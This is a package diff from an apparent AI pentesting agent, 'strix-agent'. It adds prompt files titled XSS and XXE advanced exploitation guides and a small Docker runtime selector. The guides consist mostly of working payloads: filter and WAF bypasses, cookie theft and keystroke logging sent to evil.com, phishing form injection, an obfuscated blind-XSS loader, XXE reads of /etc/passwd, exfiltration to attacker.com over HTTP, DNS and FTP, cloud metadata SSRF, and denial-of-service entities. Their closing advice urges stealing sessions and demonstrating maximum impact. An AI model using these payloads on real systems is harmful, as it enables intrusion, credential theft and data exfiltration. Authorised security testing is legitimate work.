strix-agent 0.1.1__py3-none-any.whl

strix/prompts/vulnerabilities/xss.jinja

@@ -0,0 +1,221 @@
+<xss_vulnerability_guide>
+<title>CROSS-SITE SCRIPTING (XSS) - ADVANCED EXPLOITATION</title>
+
+<critical>XSS leads to account takeover, data theft, and complete client-side compromise. Modern XSS requires sophisticated bypass techniques.</critical>
+
+<injection_points>
+- URL parameters: ?search=, ?q=, ?name=
+- Form inputs: text, textarea, hidden fields
+- Headers: User-Agent, Referer, X-Forwarded-For
+- Cookies (if reflected)
+- File uploads (filename, metadata)
+- JSON endpoints: {"user":"<payload>"}
+- postMessage handlers
+- DOM properties: location.hash, document.referrer
+- WebSocket messages
+- PDF/document generators
+</injection_points>
+
+<basic_detection>
+<reflection_testing>
+Simple: <random123>
+HTML: <h1>test</h1>
+Script: <script>alert(1)</script>
+Event: <img src=x onerror=alert(1)>
+Protocol: javascript:alert(1)
+</reflection_testing>
+
+<encoding_contexts>
+- HTML: <>&"'
+- Attribute: "'<>&
+- JavaScript: "'\/\n\r\t
+- URL: %3C%3E%22%27
+- CSS: ()'";{}
+</encoding_contexts>
+</basic_detection>
+
+<filter_bypasses>
+<tag_event_bypasses>
+<svg onload=alert(1)>
+<body onpageshow=alert(1)>
+<marquee onstart=alert(1)>
+<details open ontoggle=alert(1)>
+<audio src onloadstart=alert(1)>
+<video><source onerror=alert(1)>
+<select autofocus onfocus=alert(1)>
+<textarea autofocus>/*</textarea><svg/onload=alert(1)>
+<keygen autofocus onfocus=alert(1)>
+<frameset onload=alert(1)>
+</tag_event_bypasses>
+
+<string_bypass>
+- Concatenation: 'al'+'ert'
+- Comments: /**/alert/**/
+- Template literals: `ale${`rt`}`
+- Unicode: \u0061lert
+- Hex: \x61lert
+- Octal: \141lert
+- HTML entities: &apos;alert&apos;
+- Double encoding: %253Cscript%253E
+- Case variation: <ScRiPt>
+</string_bypass>
+
+<parentheses_bypass>
+alert`1`
+setTimeout`alert\x281\x29`
+[].map.call`1${alert}2`
+onerror=alert;throw 1
+onerror=alert,throw 1
+onerror=alert(1)//
+</parentheses_bypass>
+
+<keyword_bypass>
+- Proxy: window['al'+'ert']
+- Base64: atob('YWxlcnQ=')
+- Hex: eval('\x61\x6c\x65\x72\x74')
+- Constructor: [].constructor.constructor('alert(1)')()
+- JSFuck: [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]...
+</keyword_bypass>
+</filter_bypasses>
+
+<advanced_techniques>
+<dom_xss>
+- Sinks: innerHTML, document.write, eval, setTimeout
+- Sources: location.hash, location.search, document.referrer
+- Example: element.innerHTML = location.hash
+- Exploit: #<img src=x onerror=alert(1)>
+</dom_xss>
+
+<mutation_xss>
+<noscript><p title="</noscript><img src=x onerror=alert(1)>">
+<form><button formaction=javascript:alert(1)>
+</mutation_xss>
+
+<polyglot_xss>
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+</polyglot_xss>
+
+<csp_bypasses>
+- JSONP endpoints: <script src="//site.com/jsonp?callback=alert">
+- AngularJS: {{constructor.constructor('alert(1)')()}}
+- Script gadgets in allowed libraries
+- Base tag injection: <base href="//evil.com/">
+- Object/embed: <object data="data:text/html,<script>alert(1)</script>">
+</csp_bypasses>
+</advanced_techniques>
+
+<exploitation_payloads>
+<cookie_theft>
+<script>fetch('//evil.com/steal?c='+document.cookie)</script>
+<img src=x onerror="this.src='//evil.com/steal?c='+document.cookie">
+new Image().src='//evil.com/steal?c='+document.cookie
+</cookie_theft>
+
+<keylogger>
+document.onkeypress=e=>fetch('//evil.com/key?k='+e.key)
+</keylogger>
+
+<phishing>
+document.body.innerHTML='<form action=//evil.com/phish><input name=pass><input type=submit></form>'
+</phishing>
+
+<csrf_token_theft>
+fetch('/api/user').then(r=>r.text()).then(d=>fetch('//evil.com/token?t='+d.match(/csrf_token":"([^"]+)/)[1]))
+</csrf_token_theft>
+
+<webcam_mic_access>
+navigator.mediaDevices.getUserMedia({video:true}).then(s=>...)
+</webcam_mic_access>
+</exploitation_payloads>
+
+<special_contexts>
+<pdf_generation>
+- JavaScript in links: <a href="javascript:app.alert(1)">
+- Form actions: <form action="javascript:...">
+</pdf_generation>
+
+<email_clients>
+- Limited tags: <a>, <img>, <style>
+- CSS injection: <style>@import'//evil.com/css'</style>
+</email_clients>
+
+<markdown>
+[Click](javascript:alert(1))
+![a](x"onerror="alert(1))
+</markdown>
+
+<react_vue>
+- dangerouslySetInnerHTML={{__html: payload}}
+- v-html directive bypass
+</react_vue>
+
+<file_upload_xss>
+- SVG: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
+- HTML files
+- XML with XSLT
+- MIME type confusion
+</file_upload_xss>
+</special_contexts>
+
+<blind_xss>
+<detection>
+- Out-of-band callbacks
+- Service workers for persistence
+- Polyglot payloads for multiple contexts
+</detection>
+
+<payloads>
+'"><script src=//evil.com/blindxss.js></script>
+'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8vZXZpbC5jb20veHNzLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw onerror=eval(atob(this.id))>
+</payloads>
+</blind_xss>
+
+<waf_bypasses>
+<encoding>
+- HTML: &#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;
+- URL: %3Cscript%3E
+- Unicode: \u003cscript\u003e
+- Mixed: <scr\x69pt>
+</encoding>
+
+<obfuscation>
+<a href="j&#x61;vascript:alert(1)">
+<img src=x onerror="\u0061\u006C\u0065\u0072\u0074(1)">
+<svg/onload=eval(atob('YWxlcnQoMSk='))>
+</obfuscation>
+
+<browser_bugs>
+- Chrome: <svg><script>alert&lpar;1&rpar;
+- Firefox specific payloads
+- IE/Edge compatibility
+</browser_bugs>
+</waf_bypasses>
+
+<impact_demonstration>
+1. Account takeover via cookie/token theft
+2. Defacement proof
+3. Keylogging demonstration
+4. Internal network scanning
+5. Cryptocurrency miner injection
+6. Phishing form injection
+7. Browser exploit delivery
+8. Session hijacking
+9. CSRF attack chaining
+10. Admin panel access
+</impact_demonstration>
+
+<pro_tips>
+1. Test in all browsers - payloads vary
+2. Check mobile versions - different parsers
+3. Use automation for blind XSS
+4. Chain with other vulnerabilities
+5. Focus on impact, not just alert(1)
+6. Test all input vectors systematically
+7. Understand the context deeply
+8. Keep payload library updated
+9. Monitor CSP headers
+10. Think beyond script tags
+</pro_tips>
+
+<remember>Modern XSS is about bypassing filters, CSP, and WAFs. Focus on real impact - steal sessions, phish credentials, or deliver exploits. Simple alert(1) is just the beginning.</remember>
+</xss_vulnerability_guide>

strix/prompts/vulnerabilities/xxe.jinja

@@ -0,0 +1,276 @@
+<xxe_vulnerability_guide>
+<title>XML EXTERNAL ENTITY (XXE) - ADVANCED EXPLOITATION</title>
+
+<critical>XXE leads to file disclosure, SSRF, RCE, and DoS. Often found in APIs, file uploads, and document parsers.</critical>
+
+<discovery_points>
+- XML file uploads (docx, xlsx, svg, xml)
+- SOAP endpoints
+- REST APIs accepting XML
+- SAML implementations
+- RSS/Atom feeds
+- XML configuration files
+- WebDAV
+- Office document processors
+- SVG image uploads
+- PDF generators with XML input
+</discovery_points>
+
+<basic_payloads>
+<file_disclosure>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<root>&xxe;</root>
+
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
+<root>&xxe;</root>
+</file_disclosure>
+
+<ssrf_via_xxe>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
+<root>&xxe;</root>
+</ssrf_via_xxe>
+
+<blind_xxe_oob>
+<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
+
+evil.dtd:
+<!ENTITY % file SYSTEM "file:///etc/passwd">
+<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
+%eval;
+%exfiltrate;
+</blind_xxe_oob>
+</basic_payloads>
+
+<advanced_techniques>
+<parameter_entities>
+<!DOCTYPE foo [
+  <!ENTITY % data SYSTEM "file:///etc/passwd">
+  <!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?d=%data;'>">
+  %param;
+  %exfil;
+]>
+</parameter_entities>
+
+<error_based_xxe>
+<!DOCTYPE foo [
+  <!ENTITY % file SYSTEM "file:///etc/passwd">
+  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+  %eval;
+  %error;
+]>
+</error_based_xxe>
+
+<xxe_in_attributes>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<root attr="&xxe;"/>
+</xxe_in_attributes>
+</advanced_techniques>
+
+<filter_bypasses>
+<encoding_tricks>
+- UTF-16: <?xml version="1.0" encoding="UTF-16"?>
+- UTF-7: <?xml version="1.0" encoding="UTF-7"?>
+- Base64 in CDATA: <![CDATA[base64_payload]]>
+</encoding_tricks>
+
+<protocol_variations>
+- file:// → file:
+- file:// → netdoc://
+- http:// → https://
+- Gopher: gopher://
+- PHP wrappers: php://filter/convert.base64-encode/resource=/etc/passwd
+</protocol_variations>
+
+<doctype_variations>
+<!doctype foo [
+<!DoCtYpE foo [
+<!DOCTYPE foo PUBLIC "Any" "http://evil.com/evil.dtd">
+<!DOCTYPE foo SYSTEM "http://evil.com/evil.dtd">
+</doctype_variations>
+</filter_bypasses>
+
+<specific_contexts>
+<json_xxe>
+{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}
+</json_xxe>
+
+<soap_xxe>
+<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+    <foo>&xxe;</foo>
+  </soap:Body>
+</soap:Envelope>
+</soap_xxe>
+
+<svg_xxe>
+<svg xmlns="http://www.w3.org/2000/svg">
+  <!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+  <text>&xxe;</text>
+</svg>
+</svg_xxe>
+
+<docx_xlsx_xxe>
+1. Unzip document
+2. Edit document.xml or similar
+3. Add XXE payload
+4. Rezip and upload
+</docx_xlsx_xxe>
+</specific_contexts>
+
+<blind_xxe_techniques>
+<dns_exfiltration>
+<!DOCTYPE foo [
+  <!ENTITY % data SYSTEM "file:///etc/hostname">
+  <!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://%data;.attacker.com/'>">
+  %param;
+  %exfil;
+]>
+</dns_exfiltration>
+
+<ftp_exfiltration>
+<!DOCTYPE foo [
+  <!ENTITY % data SYSTEM "file:///etc/passwd">
+  <!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'ftp://attacker.com:2121/%data;'>">
+  %param;
+  %exfil;
+]>
+</ftp_exfiltration>
+
+<php_wrappers>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
+]>
+<root>&xxe;</root>
+</php_wrappers>
+</blind_xxe_techniques>
+
+<xxe_to_rce>
+<expect_module>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]>
+<root>&xxe;</root>
+</expect_module>
+
+<file_upload_lfi>
+1. Upload malicious PHP via XXE
+2. Include via LFI or direct access
+</file_upload_lfi>
+
+<java_specific>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:file:///tmp/evil.jar!/evil.class">]>
+</java_specific>
+</xxe_to_rce>
+
+<denial_of_service>
+<billion_laughs>
+<!DOCTYPE lolz [
+  <!ENTITY lol "lol">
+  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
+  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
+  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;">
+  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;">
+]>
+<lolz>&lol5;</lolz>
+</billion_laughs>
+
+<external_dtd_dos>
+<!DOCTYPE foo SYSTEM "http://slow-server.com/huge.dtd">
+</external_dtd_dos>
+</denial_of_service>
+
+<modern_bypasses>
+<xinclude>
+<root xmlns:xi="http://www.w3.org/2001/XInclude">
+  <xi:include parse="text" href="file:///etc/passwd"/>
+</root>
+</xinclude>
+
+<xslt>
+<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+  <xsl:template match="/">
+    <xsl:copy-of select="document('file:///etc/passwd')"/>
+  </xsl:template>
+</xsl:stylesheet>
+</xslt>
+</modern_bypasses>
+
+<parser_specific>
+<java>
+- Supports jar: protocol
+- External DTDs by default
+- Parameter entities work
+</java>
+
+<dotnet>
+- Supports file:// by default
+- DTD processing varies by version
+</dotnet>
+
+<php>
+- libxml2 based
+- expect:// protocol with expect module
+- php:// wrappers
+</php>
+
+<python>
+- Default parsers often vulnerable
+- lxml safer than xml.etree
+</python>
+</parser_specific>
+
+<validation_testing>
+<detection>
+1. Basic entity test: &xxe;
+2. External DTD: http://attacker.com/test.dtd
+3. Parameter entity: %xxe;
+4. Time-based: DTD with slow server
+5. DNS lookup: http://test.attacker.com/
+</detection>
+
+<false_positives>
+- Entity declared but not processed
+- DTD loaded but entities blocked
+- Output encoding preventing exploitation
+- Limited file access (chroot/sandbox)
+</false_positives>
+</validation_testing>
+
+<impact_demonstration>
+1. Read sensitive files (/etc/passwd, web.config)
+2. Cloud metadata access (AWS keys)
+3. Internal network scanning (SSRF)
+4. Data exfiltration proof
+5. DoS demonstration
+6. RCE if possible
+</impact_demonstration>
+
+<automation>
+# XXE Scanner
+def test_xxe(url, param):
+    payloads = [
+        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
+        '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/"> %xxe;]><foo/>',
+        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
+    ]
+
+    for payload in payloads:
+        response = requests.post(url, data={param: payload})
+        if 'root:' in response.text or check_callback():
+            return f"XXE found with: {payload}"
+</automation>
+
+<pro_tips>
+1. Try all protocols, not just file://
+2. Use parameter entities for blind XXE
+3. Chain with SSRF for cloud metadata
+4. Test different encodings (UTF-16)
+5. Don't forget JSON/SOAP contexts
+6. XInclude when entities are blocked
+7. Error messages reveal file paths
+8. Monitor DNS for blind confirmation
+9. Some parsers allow network access but not files
+10. Modern frameworks disable XXE by default - check configs
+</pro_tips>
+
+<remember>XXE is about understanding parser behavior. Different parsers have different features and restrictions. Always test comprehensively and demonstrate maximum impact.</remember>
+</xxe_vulnerability_guide>

strix/runtime/__init__.py

@@ -0,0 +1,19 @@
+import os
+
+from .runtime import AbstractRuntime
+
+
+def get_runtime() -> AbstractRuntime:
+    runtime_backend = os.getenv("STRIX_RUNTIME_BACKEND", "docker")
+
+    if runtime_backend == "docker":
+        from .docker_runtime import DockerRuntime
+
+        return DockerRuntime()
+
+    raise ValueError(
+        f"Unsupported runtime backend: {runtime_backend}. Only 'docker' is supported for now."
+    )
+
+
+__all__ = ["AbstractRuntime", "get_runtime"]